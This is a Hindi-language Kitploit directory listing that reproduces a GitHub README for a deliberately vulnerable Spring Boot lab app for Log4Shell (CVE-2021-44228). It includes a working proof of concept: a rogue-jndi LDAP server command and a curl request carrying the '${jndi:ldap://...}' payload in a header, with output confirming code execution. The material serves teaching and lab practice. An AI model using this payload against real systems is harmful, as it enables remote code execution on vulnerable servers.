Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228-poc — log4shell नमूना एप्लिकेशन (CVE-2021-44228) | Kitploit
उपकरण/GitHubGitHub/kadantte/cve-2021-44228-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubkadantte/cve-2021-44228-poc

CVE-2021-44228-poc

log4shell नमूना एप्लिकेशन (CVE-2021-44228)

रिपॉजिटरी देखें
434 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4Shell नमूना कमजोर अनुप्रयोग (CVE-2021-44228)

यह https://github.com/christophetd/log4shell-vulnerable-app का लगभग प्रतिलिपि/समान कमजोर अनुप्रयोग है।

मुख्य अंतर ग्रेडल के बजाय मेवेन का उपयोग और rogue-jndi का उपयोग है।

इस रिपॉजिटरी में एक मेवेन स्प्रिंग बूट वेब अनुप्रयोग है जो CVE-2021-44228 के प्रति संवेदनशील है, जिसे Log4Shell उपनाम दिया गया है।

यह Log4j 2.6.1 और JDK संस्करण 1.8.0_181 का उपयोग करता है।

स्प्रिंगबूट अनुप्रयोग चलाना

डॉकर स्प्रिंगबूट अनुप्रयोग बनाएं और चलाएं:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 vulnerable-app

शोषण

  1. git clone https://github.com/veracode-research/rogue-jndi
  2. cd rogue-jndi
  3. mvn package
  4. java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test_if_rce" --hostname "192.168.1.x"

दूसरा टर्मिनल खोलें

  1. curl localhost:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.1.x:1389/o=reference}'

जहां दोनों मामलों में 192.168.1.x आपका आईपी है

नोट: localhost का उपयोग न करें, अपना वास्तविक निजी आईपी पता उपयोग करें।

अब जांचें कि RCE सफल हुआ या नहीं:

root@kitploit:~
$ docker ps                                 
CONTAINER ID   IMAGE            COMMAND                  CREATED         STATUS         PORTS                                       NAMES
04536dbd1dff   vulnerable-app   "java -jar demo-0.0.…"   2 minutes ago   Up 2 minutes   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   gallant_easley
root@kitploit:~
$ docker container exec -it 04536dbd1dff ash
/opt/app # ls /tmp
hsperfdata_root                          tomcat-docbase.8080.4585569232401237075
test_if_rce                              tomcat.8080.1707298461175346507

जैसा कि आप देख सकते हैं, test_if_rce फ़ाइल मौजूद है। जिसका अर्थ है कि RCE सफल रहा।

नोट

कोड और विचार निम्नलिखित रिपॉजिटरी से लिए गए हैं:

  • https://github.com/rayhan0x01/log4shell-vulnerable-app/tree/mod

  • https://www.lunasec.io/docs/blog/log4j-zero-day/

  • https://github.com/christophetd/log4shell-vulnerable-app

टूल डाउनलोड करें